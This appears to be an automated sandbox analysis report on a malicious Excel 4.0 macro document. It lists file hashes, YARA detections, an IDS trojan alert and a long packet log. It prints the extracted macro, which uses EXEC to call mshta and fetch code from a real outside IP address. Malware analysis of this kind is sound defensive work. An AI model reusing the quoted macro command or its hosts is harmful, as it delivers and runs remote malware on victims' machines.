                                                                                                                    SHA-512:EB20B6E62892E550C89B0117D5689DC093DEB6B65C43366C399DD93E0AC78BF9F5578E43151CB34E9F4FD1D69B4D74C5E7DC25A1BC4B6438EFC84F55273C495C
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):8016
                                                                                                                    Entropy (8bit):3.5771325831414917
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:chQCcMqAqvsqvJCwoqz8hQCcMqAqvsEHyqvJCworAzIuYtHRUVh/lUV0A2:cidoqz8iFHnorAzI1UVhHA2
                                                                                                                    MD5:739473D4AA0429FF1319C5EB227EAAD3
                                                                                                                    SHA1:CA575798F0BD07E2CD11E918FE367D6E716CAF54
                                                                                                                    SHA-256:01ACBA9C38F360BBE15FA5B86E5C313A206BF0E68230FF1E40598E5144547DD2
                                                                                                                    SHA-512:EB20B6E62892E550C89B0117D5689DC093DEB6B65C43366C399DD93E0AC78BF9F5578E43151CB34E9F4FD1D69B4D74C5E7DC25A1BC4B6438EFC84F55273C495C
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):86528
                                                                                                                    Entropy (8bit):7.100272352481004
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:g0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIzSEV2NnX4Ia3gg5W8IuD7PoHsP7e30:g0k3hbdlylKsgqopeJBWhZFGkE+cMLx0
                                                                                                                    MD5:2C1128D3E74CCABAC63488793B1F9FC1
                                                                                                                    SHA1:44BEE61E3B69FA078FA3149A86EE14A6254F41AF
                                                                                                                    SHA-256:D6C0FE94AE6A74F54312237003CEF973E0874FC637312DF0E199207015D947B4
                                                                                                                    SHA-512:834D97F729ACF6F20ED523935BE80B4F94371B1E1CC1629ACFCDF2D0519217D67B2B38FFFD0383EBF8C0F6F837A044C97FA4F8C11E2F45B713132C98CCD56479
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\CJ68000754184.xls, Author: John Lambert @JohnLaTwC
                                                                                                                    • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\CJ68000754184.xls, Author: Joe Security
                                                                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):548864
                                                                                                                    Entropy (8bit):6.980517956334168
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:B2AavzUBPSczbeeTLjvWyMwWd3DYr6i64/:OUBPSczbeeTnvqZDWA
                                                                                                                    MD5:74D1C2A27C684005BDFCE89A1A5618B4
                                                                                                                    SHA1:033C28F6D209BA26560E472FEA70DDF740435EA0
                                                                                                                    SHA-256:34347D89E1A340EDC48F050CDDD15CB1E3B1702932887AEA3D97D0D0BFFE4DE8
                                                                                                                    SHA-512:E0A9010A2AAB912D48672F0DBD30E65664CAE4DA12B4E5444FB5AD8262E4099FFD08E15113871B3EA76EFA07F2F307319ACD699CE49F83CDF2C7734EBDE360A2
                                                                                                                    Malicious:false
                                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
                                                                                                                    Entropy (8bit):7.044070003028746
                                                                                                                    TrID:
                                                                                                                    • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                    File name:CJ68000754184.xls
                                                                                                                    File size:87565
                                                                                                                    MD5:84edef677d286111cb0ef9d53e0d51df
                                                                                                                    SHA1:19548ae67f6ffec8a1c2cb9b768cb1e64d29dbcb
                                                                                                                    SHA256:081b5ea7f6d4ce96c9c97811785f86a68809a51eaadba0928406f562ec8ea58a
                                                                                                                    SHA512:3fa012d744b2c065aaed9aa425f88f367b914dcd4f57e902cb6c96493872d12a13f7fdc4c476bf7319c36c0d555be84df8bb4594e4323cc1c51ef0853f8e59fe
                                                                                                                    SSDEEP:1536:H0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIzSEV2NnX4Ia3gg5W8IuD7PoHsP7e3/:H0k3hbdlylKsgqopeJBWhZFGkE+cMLxz
                                                                                                                    Icon Hash:e4eea286a4b4bcb4
                                                                                                                    Document Type:OLE
                                                                                                                    Number of OLE Files:1
                                                                                                                    Has Summary Info:True
                                                                                                                    Application Name:Microsoft Excel
                                                                                                                    Encrypted Document:False
                                                                                                                    Contains Word Document Stream:False
                                                                                                                    Contains Workbook/Book Stream:True
                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                    Contains Visio Document Stream:False
                                                                                                                    Contains ObjectPool Stream:
                                                                                                                    Flash Objects Count:
                                                                                                                    Contains VBA Macros:True
                                                                                                                    Code Page:1251
                                                                                                                    Author:xXx
                                                                                                                    Last Saved By:xXx
                                                                                                                    Create Time:2022-01-27 23:41:00
                                                                                                                    Last Saved Time:2022-01-28 06:31:03
                                                                                                                    Creating Application:Microsoft Excel
                                                                                                                    Security:0
                                                                                                                    Document Code Page:1251
                                                                                                                    Thumbnail Scaling Desired:False
                                                                                                                    Company:
                                                                                                                    Contains Dirty Links:False
                                                                                                                    Shared Document:False
                                                                                                                    Changed Hyperlinks:False
                                                                                                                    Application Version:1048576
                                                                                                                    General
                                                                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                                                                    File Type:data
                                                                                                                    Stream Size:4096
                                                                                                                    Entropy:0.324918127833
                                                                                                                    Base64 Encoded:False
                                                                                                                    General
                                                                                                                    Stream Path:\x5SummaryInformation
                                                                                                                    File Type:data
                                                                                                                    Stream Size:4096
                                                                                                                    Entropy:0.263079431268
                                                                                                                    Base64 Encoded:False
                                                                                                                    General
                                                                                                                    Stream Path:Workbook
                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                    Stream Size:76002
                                                                                                                    Entropy:7.62172227998
                                                                                                                    Base64 Encoded:True
                                                                                                                    Name:REEEEEEEE
                                                                                                                    Type:3
                                                                                                                    Final:False
                                                                                                                    Visible:False
                                                                                                                    Protected:False
REEEEEEEE 3 False 0 False post
2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html")
5,2,=HALT()
                                                                                                                    Name:REEEEEEEE
                                                                                                                    Type:3
                                                                                                                    Final:False
                                                                                                                    Visible:False
                                                                                                                    Protected:False
REEEEEEEE 3 False 0 False pre
2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html")
5,2,=HALT()
Timestamp:01/28/22-21:18:27.714526
Protocol:TCP
SID:2034631
Message:ET TROJAN Maldoc Activity (set)
Source Port:49168
Dest Port:80
Source IP:192.168.2.22
Dest IP:91.240.118.172
Timestamp, Source Port, Dest Port, Source IP, Dest IP
                                                                                                                    Jan 28, 2022 21:18:50.117503881 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.117506981 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.117516041 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.117520094 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.117536068 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.117552042 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.117568016 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.117571115 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.117583036 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.117599010 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.117614985 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.117616892 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.117630005 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.117645025 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.117660046 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.117660046 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.117979050 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.119275093 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.119293928 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.119306087 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.119322062 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.119324923 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.119338989 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.119353056 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.119354963 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.119371891 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.119388103 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.119388103 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.119398117 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.119414091 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.119430065 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.119434118 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.119446993 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.119458914 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.119462967 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.119481087 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.119497061 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.119505882 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.119513988 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.119529963 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.119534969 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.119545937 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.119561911 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.119561911 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.119576931 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.119591951 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.119594097 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.119605064 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.119616032 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.296725035 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.296749115 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.296766043 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.296782970 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.296792030 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.296801090 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.296808958 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.296818018 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.296833992 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.296843052 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.296847105 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.296863079 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.296864033 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.296879053 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.296892881 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.296900034 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.296910048 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.296921015 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.296926975 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.296942949 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.296977043 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.297024965 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.297041893 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.297056913 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.297056913 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.297074080 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.297081947 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.298541069 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.298558950 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.298574924 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.298580885 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.298592091 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.298604012 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.298609018 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.298624992 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.298640013 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.298655987 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.298656940 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.298670053 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.298676968 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.298683882 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.298703909 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.298712015 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.298723936 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.298727036 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.298743963 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.298744917 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.298760891 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.298773050 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.298777103 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.298793077 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.298808098 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.298824072 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.298825979 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.298839092 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.298851013 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.298854113 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.298870087 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.298883915 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.298886061 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.298899889 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.298913956 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.299015045 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.475946903 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.475970030 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.475986004 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.476002932 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.476016998 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.476021051 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.476037025 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.476044893 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.476056099 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.476070881 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.476092100 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.476103067 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.476109028 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.476125002 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.476135015 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.476140976 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.476161003 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.476169109 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.476171970 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.476181984 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.476197004 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.476197958 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.476212978 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.476227999 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.476243019 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.476243973 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.476283073 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.477797031 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.477813959 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.477832079 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.477858067 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.477859020 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.477875948 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.477893114 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.477895021 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.477910042 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.477926016 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.477931976 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.477942944 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016452074 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016458035 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016472101 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016490936 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016491890 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.016508102 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016520023 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016521931 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.016535997 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016547918 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.016552925 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016576052 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016581059 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016585112 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.016592979 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016608953 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016623974 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.016623974 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016639948 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016654015 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.016655922 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016670942 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016685963 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.016686916 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016719103 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.193804026 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.193836927 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.193883896 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.193901062 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.193917036 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.193945885 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.193953037 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.193969011 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.193974972 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.193985939 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.193999052 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.194001913 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.194019079 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.194029093 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.194036007 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.194052935 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.194065094 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.194067955 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.194083929 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.194099903 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.194102049 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.194114923 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.194129944 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.194130898 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.194147110 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.194161892 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.194178104 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.194227934 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.195940971 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.195966959 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.195982933 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.195998907 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196000099 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196014881 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196033955 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196043015 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196053982 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196063042 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196072102 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196093082 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196101904 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196115017 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196135044 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196145058 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196158886 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196182966 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196191072 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196202993 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196227074 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196233988 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196249008 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196269035 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196290016 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196290970 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196315050 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196319103 CET4917080192.168.2.22103.206.244.105
